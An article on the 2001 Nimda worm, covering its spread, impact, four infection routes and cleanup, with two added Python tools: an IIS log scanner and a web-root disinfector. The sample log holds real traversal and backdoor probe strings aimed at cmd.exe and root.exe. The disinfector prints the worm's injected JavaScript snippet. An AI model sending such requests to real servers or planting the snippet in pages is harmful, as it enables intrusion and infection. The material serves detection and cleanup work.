COMPUTER RESEARCH & TECHNOLOGY
Abstract

Once again many people have seen Internet bandwidth and performance slow to a crawl. This time it was courtesy of the most potent Internet worm yet, which flooded PCs and servers around the world in its attempts to infect vulnerable systems. At first thought to be a relatively low-grade problem that was already ebbing, the worm struck back as a vicious "High Risk", highly automated, multi-headed monster capable of creating havoc for home users, business users and the Internet infrastructure itself. Known as "Nimda" or the "readme.exe" virus, this insidious worm spreads by sending infected e-mail messages, copying itself to computers within networks, and compromising Web servers that run Microsoft's Internet Information Server (IIS) software. Yet again a worm has spread via systems running Microsoft software and all but crashed the Internet with data. Nimda, said to be "admin" (the shortened form of "system administrator") spelled backwards, has proven so malicious that the FBI has created a task force to investigate the attack.

What Has Been the Impact of the Virus?

The Nimda worm hit so quickly, peaking within 6 hours, and caused so much havoc that accurate analysis of the worm has been difficult. In general it is fair to say that everyone who does business on the Web was affected. The highest concentrations of infected systems were in Canada, Denmark, Italy, Norway, the United Kingdom and the United States. The number of infections identified is considered the tip of the iceberg: many others have been infected who either don't yet know it or haven't reported it. Alert volumes have increased by as much as 10,000 times normal. Nimda is spreading five times faster than the Code Red worm, which hit in July and August. Because it is so automated, it has so far not needed any psychological tricks to spread.
Alarming infection rates are occurring throughout parts of Asia. South Korea reported that infections were growing exponentially, with an 11-fold increase.

How Did the Virus Manage to Spread So Quickly?

The worm originally spread quickly by broadly scanning local networks and the Internet for Web servers running Microsoft's Internet Information Server software that were vulnerable to one of two well-known flaws. It therefore did not have to wait for people to receive and open e-mail and then re-transmit it; by scanning, it started infecting straight away, automatically.

Who Does Nimda Infect?

Also known as "readme.exe" and "W32.Nimda", the worm is the first to use four different methods of infection. It infects PCs running Windows 95, 98, Me and 2000, as well as servers running Windows 2000 and Windows NT.

How Does It Work?

The worm spreads by four routes, each described in detail under "For the Inquiring Mind" below: exploiting vulnerable or already-backdoored IIS Web servers, infecting visitors who view pages on a compromised server, mass-mailing itself, and copying itself across open network shares.
Much of the worm's virulence is due to its unusually high degree of automation. A contaminated e-mail attachment opens automatically under Microsoft's Outlook e-mail program if the program's security settings are set to "low" and/or a security patch has not been installed. Even on computers not using Outlook, the worm can still spread by starting its own e-mail engine. Recipients of the mass-mailing worm get an e-mail message with an attachment titled "readme.exe", usually disguised as an audio file. The worm also generates a veritable flood of Internet traffic as it scans the Internet for vulnerable servers to infect. This automated scanning causes huge connectivity problems for business networks on the Internet.

Is There a Link to the World Trade Center Attack?

The FBI said the agency was "assessing" the incident, but so far it has found no relationship between the online deluge and the previous week's terrorist attacks on the World Trade Center and the Pentagon. The worm first appeared in the United States on the Tuesday and spread to Asia overnight. Thousands of European businesses also opened on the Wednesday with infected computer systems. Some industry insiders remain open-minded on the matter.

Why Didn't the ISP Community Contain the Outbreak?

Because of its tenacity, the worm caused some Internet service providers to take drastic steps to block their own customers from spreading the worm and overloading networks with traffic. One ISP was said to have disconnected over twenty-five percent of its customers' Web servers from the Internet in an attempt to stop the flood of data produced by the worm. A broadband (ADSL) ISP is said to have completely cut off many of its customers after it became apparent that their computers had been infected by the worm and were reducing bandwidth to old dial-up speeds.
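The scanning traffic described above, the automated probes for vulnerable IIS servers that swamped ISP links, leaves a recognisable trail in the Web server's own logs. The following Python is an added example written for this page, not code from Arthur Hissey's article or from any vendor. It resolves each request path the way the vulnerable server effectively did (two percent-decoding passes, and a deliberately permissive byte decoder that is a simplified model of the Folder Traversal bug, not Microsoft's actual code), then classifies the request. The log excerpt is constructed for the example; the probe strings in it are the well-known Nimda and Code Red II request paths.

```python
import string
from urllib.parse import unquote

# Constructed IIS W3C extended log excerpt (invented for this example, not a real capture).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-09-18 10:02:11 10.0.0.7 GET /scripts/root.exe /c+dir 404
2001-09-18 10:02:12 10.0.0.7 GET /MSADC/root.exe /c+dir 404
2001-09-18 10:02:13 10.0.0.7 GET /c/winnt/system32/cmd.exe /c+dir 404
2001-09-18 10:02:14 10.0.0.7 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 200
2001-09-18 10:02:15 10.0.0.7 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200
2001-09-18 10:02:16 10.0.0.7 GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe /c+dir 404
2001-09-18 10:03:01 10.0.0.9 GET /index.htm - 200
2001-09-18 10:03:02 10.0.0.9 GET /images/logo.gif - 200
"""


def percent_decode(s: str) -> bytes:
    """One pass of %XX decoding. Malformed escapes are kept literally, which is
    exactly what lets a double-encoded %255c survive the first pass as %5c."""
    out = bytearray()
    i = 0
    while i < len(s):
        if s[i] == "%" and i + 2 < len(s) and all(c in string.hexdigits for c in s[i + 1:i + 3]):
            out.append(int(s[i + 1:i + 3], 16))
            i += 3
        else:
            out.extend(s[i].encode("utf-8"))
            i += 1
    return bytes(out)


def lenient_utf8(b: bytes) -> str:
    """Simplified model (an assumption of this example) of the permissive decoding the
    Folder Traversal bug relied on: a 0xC0-0xDF lead byte swallows the next byte and keeps
    only the low bits, so the overlong/malformed pairs %c0%af and %c1%1c become '/' and '\\'."""
    out = []
    i = 0
    while i < len(b):
        c = b[i]
        if 0xC0 <= c <= 0xDF and i + 1 < len(b):
            out.append(chr(((c & 0x1F) << 6) | (b[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(c))
            i += 1
    return "".join(out)


def strict_decode(raw_stem: str) -> str:
    """What a standards-following decoder produces: the overlong sequence is rejected and
    replaced with U+FFFD, so the slash it was hiding never appears in the output."""
    return unquote(raw_stem)


def canonical_path(raw_stem: str) -> str:
    """Resolve the path to what the file system would have seen: two decode passes
    (covering the later 'superfluous decode' bug), backslashes folded, lower-cased."""
    s = raw_stem
    for _ in range(2):
        s = lenient_utf8(percent_decode(s))
    return s.replace("\\", "/").lower()


def classify_request(raw_stem: str) -> str:
    path = canonical_path(raw_stem)
    if path.endswith("/root.exe"):
        # root.exe is the renamed cmd.exe that Code Red II left in /scripts and /MSADC
        return "code-red-ii-backdoor"
    if path.endswith("/winnt/system32/cmd.exe"):
        # either climb out of a virtual directory, or walk in through the /c and /d
        # virtual roots that Code Red II mapped to the C: and D: drives
        return "iis-traversal" if "/../" in path else "cmd-via-mapped-drive"
    return "benign"


def scan_iis_log(text: str) -> dict:
    """Return {client_ip: [(raw_stem, label), ...]} for every non-benign request."""
    hits = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 7:
            continue
        client_ip, stem = fields[2], fields[4]
        label = classify_request(stem)
        if label != "benign":
            hits.setdefault(client_ip, []).append((stem, label))
    return hits


if __name__ == "__main__":
    for ip, probes in scan_iis_log(SAMPLE_LOG).items():
        print(f"{ip}: {len(probes)} probe(s)")
        for stem, label in probes:
            print(f"  {label:22} {stem} -> {canonical_path(stem)}")
```

The point of the two decoders is the caveat a detection author needs: a strict URL decoder turns `%c0%af` into replacement characters and hides the slash the attacker was smuggling, so signatures that run after a strict decode can miss exactly the requests that succeeded against the vulnerable server. Resolving the effective path first, then matching on the target (`cmd.exe`, `root.exe`), catches every encoding variant with one rule.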
Some frustrated and infuriated customers accused their ISPs of being ill prepared as the virus hit their systems. They accused ISPs of using the worm as a convenient excuse to cover the fact that they were not up to date with all the necessary protection. Most ISPs agreed that it could be months before the virus is completely eradicated.

How Has Nimda Affected Business?

Many of the bigger companies appear to be taking measures quickly, but traditionally SOHO computer users and small businesses are relatively slow to respond. Many small businesses that have embraced the Internet have their networks set up by outside IT firms; they don't have full-time technical IT people on staff to monitor and react to these types of events. This makes them the most susceptible during these attacks. They also become victims because they tend to centralise all functions under one server, making them even more vulnerable. Nonetheless, larger firms and organisations have also been severely hit. No one was spared. Parliament House was forced off-line, along with large and small institutions from almost all business sectors. The mere presence of the worm has forced some companies to shut down parts of their networks to prevent infection or further exposure.

Where Are the Future Threats of This Virus?

As business comes to grips with this virus, home users are going to be the next primary mechanism for the e-mail spread of contamination. Owners of home PCs often do not keep their anti-virus software current with the latest virus definitions. It is these users that have anti-virus experts worried: getting home users to protect their systems adequately and keep them up to date can be a challenge.

How Do We Get Rid of Nimda From Our Computers?

Anti-virus software companies and other security firms are continuing to develop software tools to help clean computer systems.
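One of the cleanup tasks behind the tools mentioned above is finding and removing the JavaScript the worm appends to Web pages on a compromised server, together with the readme.eml copies it drops beside them (the mechanism is described in item 1 under "For the Inquiring Mind" below). The following Python is an added example written for this page, not code from Arthur Hissey's article or from any anti-virus vendor. It assumes the exact snippet text published in CERT advisory CA-2001-26 and the two dropped file names from the same advisory; the document tree it scans is constructed in the code, not taken from a real compromised host.

```python
import os
import re
import tempfile

# Exact fragment the worm appended to .htm, .html and .asp files on a compromised server
# (CERT CA-2001-26). readme.eml is the worm itself, wrapped as a mail message.
NIMDA_SNIPPET = ('<html><script language="JavaScript">'
                 'window.open("readme.eml", null, "resizable=no,top=6000,left=6000")'
                 '</script></html>')

# Tolerant signature: a script block that pops open an .eml resource. No ordinary page does
# this, so it also catches whitespace-mangled or slightly edited copies of the snippet.
INJECTED_SCRIPT = re.compile(
    r'<html>\s*<script[^>]*>\s*window\.open\(\s*"[^"]*\.eml"[^)]*\)\s*;?\s*</script>\s*</html>',
    re.IGNORECASE)

# Files the worm drops next to the pages it modifies (readme.nws is the second name CERT lists).
DROPPED_NAMES = {"readme.eml", "readme.nws"}
WEB_EXTENSIONS = (".htm", ".html", ".asp")


def is_injected(html: str) -> bool:
    return INJECTED_SCRIPT.search(html) is not None


def clean_html(html: str) -> str:
    """Strip every injected block; unchanged input comes back unchanged."""
    return INJECTED_SCRIPT.sub("", html)


def scan_webroot(root: str) -> dict:
    """Walk a document tree and report modified pages and dropped worm files."""
    found = {"infected_pages": [], "dropped_files": []}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if name.lower() in DROPPED_NAMES:
                found["dropped_files"].append(path)
            elif name.lower().endswith(WEB_EXTENSIONS):
                with open(path, encoding="latin-1") as fh:
                    if is_injected(fh.read()):
                        found["infected_pages"].append(path)
    return found


def disinfect_webroot(root: str) -> dict:
    """Remove the snippet from pages and delete dropped files; returns what was changed.
    Cleaning content does not close the hole: the server must still be patched, otherwise
    the next scan re-infects it, which is the re-infection pattern the article describes."""
    found = scan_webroot(root)
    for path in found["infected_pages"]:
        with open(path, encoding="latin-1") as fh:
            original = fh.read()
        with open(path, "w", encoding="latin-1") as fh:
            fh.write(clean_html(original))
    for path in found["dropped_files"]:
        os.remove(path)
    return found


def build_sample_webroot() -> str:
    """Constructed tree for the demo (invented content, not a real compromised host)."""
    root = tempfile.mkdtemp(prefix="nimda_demo_")
    os.makedirs(os.path.join(root, "products"))
    pages = {
        "index.htm": "<html><body><h1>Welcome</h1></body></html>\n" + NIMDA_SNIPPET,
        "about.html": "<html><body>About us</body></html>\n",
        os.path.join("products", "list.asp"):
            "<% Response.Write(\"catalogue\") %>\n" + NIMDA_SNIPPET,
    }
    for rel, text in pages.items():
        with open(os.path.join(root, rel), "w", encoding="latin-1") as fh:
            fh.write(text)
    for rel in ("readme.eml", os.path.join("products", "readme.eml")):
        with open(os.path.join(root, rel), "w") as fh:
            fh.write("MIME-Version: 1.0\n(placeholder body, constructed for the demo)\n")
    return root


if __name__ == "__main__":
    root = build_sample_webroot()
    before = scan_webroot(root)
    print("infected pages:", before["infected_pages"])
    print("dropped files: ", before["dropped_files"])
    disinfect_webroot(root)
    print("after cleaning:", scan_webroot(root))
```

Run it against a copy of the document root rather than the live one first, and treat a non-empty report as evidence that the worm has also done everything else item 1 below describes (an enabled Guest account with administrative rights, an open C: share, a start-up entry); page cleanup is only one step of the rebuild.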
However, even if people and companies completely eliminate the worm from their networks and computers, Nimda will remain out there for a long time to come. The previous worm, Code Red, and its variants still account for some 30,000 infections worldwide. As one organisation's Web servers become infected with the worm, they risk contaminating any user viewing a Web page hosted on those servers. Code Red is still going strong because, almost unbelievably, many un-patched systems still remain on the Web. By that measure alone, Nimda should be around for quite a while. Nimda's extensive replacement of key files and programs on infected computers, and its use of Windows file sharing to spread across local area networks, have made it extraordinarily difficult to clean out. Immediate re-infection rates have also been remarkably high. Microsoft has posted an extensive list of patches and advisories to combat the worm. Analyses of the Nimda worm can be found at CERT.

How Are We Going to Better Manage Future Outbreaks?

Software producers will have to become far more proactive about contacting customers when major security threats like Nimda arise. Rather than posting an advisory on a hard-to-find Web site or waiting for the news media, software companies should e-mail customers telling them to update their software immediately.

How Is Microsoft Reacting to This Virus?

Microsoft denied claims last Wednesday that the main Web site of its "FrontPage" software was infected with the Nimda virus. Concerns were raised when anti-virus software alarms were set off when viewing the site. Initially security experts believed Microsoft might have failed to patch at least one major server. However, a Microsoft spokesman later said that wasn't the case. Some feel that should be of small comfort to computer users.
A representative of one anti-virus company stated: "Not only do they have an application-development history of having massive security flaws, they have an operations history of having flaws." In August of this year Microsoft admitted Code Red had infected its Hotmail e-mail service. To be fair, however, Microsoft isn't alone. This time around, many Web servers have been infected with the Nimda worm.

For the Inquiring Mind

1) First, if the server had already been compromised by the Code Red II worm, Nimda used the backdoor Code Red II left behind to copy itself to the server as a file named "admin.dll". For all other IIS servers, the program attempted to use the "Web Server Folder Traversal" vulnerability discovered in October 2000 to copy the file "admin.dll" to the server. Once the file is copied, the worm executes it and infects the new victim. On such servers the worm enables the built-in "Guest" account and gives it administrative privileges, copies itself to any network drives, makes the C: drive publicly accessible as a share, and appends a script to HTM, HTML and ASP files. Those files will then attempt to deliver a copy of the worm to the computer of anyone who views a Web page hosted by the infected server with a browser that has JavaScript enabled. The worm also deletes the registry keys that set the security preferences for the computer and arranges for itself to be run at start-up.

2) The ability to infect others through the viewing of a Web page is the Nimda worm's second path of infection. The snippet of JavaScript added to each Web file on an infected server causes the worm, renamed "readme.eml", to be downloaded from the server to the visitor's computer. The worm runs automatically on PCs using un-patched versions of Microsoft's Internet Explorer 5.5 SP1 or earlier. On other browsers with JavaScript enabled, the worm's script will make the browser try to fetch the file, but the browser asks the user's permission first.

3) PCs can also be infected through the worm's third mode of transmission: e-mail.
On infected computers, the Nimda worm runs its own mail engine and sends e-mail to addresses in the Windows Address Book as well as to addresses culled from the machine's browser cache, which stores elements of recently viewed Web pages. The e-mail appears to carry an attached WAV file, but in reality it uses an old MIME (Multipurpose Internet Mail Extensions) vulnerability to run the worm automatically as soon as the e-mail is viewed in the mail client's preview pane. Even on computers that are not vulnerable to the flaw, the attachment causes the Outlook and Outlook Express e-mail programs to open a dialog box asking the user for permission to open the file. If the worm infects a PC through either the Web browser or e-mail, Nimda acts much as it does on servers. In addition, the worm adds a "load.exe" file to the Windows System directory, appends itself to many .exe, .eml and Word document files, and replaces common applications such as WordPad, WinZip32 and HyperTerminal with copies that execute the worm. It also places copies of "Riched20.dll", the library that provides the rich-text editing control used by Word, WordPad and other editing programs, in multiple places on every accessible hard drive. Whenever a program that loads Riched20.dll starts, that also executes the worm.

4) This ability to spread copies of itself throughout corporate networks by using shared drives is the fourth way the worm infects. Using the network-sharing mechanism, the Nimda worm spreads fast and makes extermination very difficult. As fast as you can clean one area of the network, it seems to come back behind you and re-infect the cleaned systems.

Arthur Hissey
ETOPICS
Keep up to date with the latest in the IT/Communications industry by listening to ABC Local Radio on FM107.1, every Tuesday morning at 9.15 AM. Computer Research & Technology Managing Director Arthur Hissey and Morning Host Janice McGilchrist will be discussing current matters of interest and future directions in the IT industry. Transcripts of these discussions and other topics are available.